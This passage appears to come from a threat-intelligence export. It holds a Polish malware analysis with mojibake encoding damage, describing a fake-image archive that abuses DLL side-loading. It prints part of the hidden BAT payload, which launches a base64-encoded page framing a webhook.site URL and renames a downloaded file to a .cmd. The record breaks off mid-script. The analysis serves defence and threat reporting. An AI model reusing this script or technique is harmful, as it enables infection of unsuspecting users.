plik\u00c3\u00b3w), ofierze ukazuje si\u00c4\u0099 nast\u00c4\u0099puj\u00c4 cy widok:\r\n\r\n  Tak naprawd\u00c4\u0099 archiwum zawiera trzy pliki: \r\n\r\n \r\n * kalkulator windowsowy ze zmienion\u00c4 nazw\u00c4 , np. IMG-238279780.jpg.exe, kt\u00c3\u00b3ry udaje zdj\u00c4\u0099cie i zach\u00c4\u0099ca ofiar\u00c4\u0099 do klikni\u00c4\u0099cia,\r\n * skrypt .bat (plik ukryty),\r\n * fa\u00c5\u0082szyw\u00c4 bibliotek\u00c4\u0099 WindowsCodecs.dll (plik ukryty).\r\n \r\n Je\u00c5\u009bli ofiara uruchomi plik IMG-238279780.jpg.exe (b\u00c4\u0099d\u00c4 cy nieszkodliwym kalkulatorem), podczas startu spr\u00c3\u00b3buje on za\u00c5\u0082adowa\u00c4\u0087 bibliotek\u00c4\u0099 WindowsCodecs.dll, kt\u00c3\u00b3ra zosta\u00c5\u0082a podstawiona przez atakuj\u00c4 cych. Jest to technika znana jako *DLL Side-Loading*. Jedyn\u00c4 rol\u00c4 biblioteki DLL jest uruchomenie do\u00c5\u0082\u00c4 czonego skryptu BAT:\r\n\r\n @echo off if not DEFINED IS\\_MINIMIZED ( set IS\\_MINIMIZED=1 start \"\" /min \"%~dpnx0\" %* exit ) start msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlYmhvb2suc2l0ZS9hYWU0MmFlNC1mM2VhLTRkYmYtYTMzZi0zZmY1YjFiYWVjOWIiIHN0eWxlPSJwb3NpdGlvbjpmaXhlZDsgdG9wOjA7IGxlZnQ6MDsgYm90dG9tOjA7IHJpZ2h0OjA7IHdpZHRoOjEwMCU7IGhlaWdodDoxMDAlOyBib3JkZXI6bm9uZTsgbWFyZ2luOjA7IHBhZGRpbmc6MDsgb3ZlcmZsb3c6aGlkZGVuOyB6LWluZGV4Ojk5OTk5OTsiPjwvaWZyYW1lPg== timeout 15 > nul move %userprofile%\\downloads\\IMG-63492336968.jpg %programdata%\\IMG-63492336968.cmd > nul type nu
        "id": "620",
        "event_id": "220651",
        "timestamp": "1715185395",
        "uuid": "2d5b8eaf-a5c9-49e3-92be-aed19adeddb4",
        "deleted": false
      }
    ]
  }
}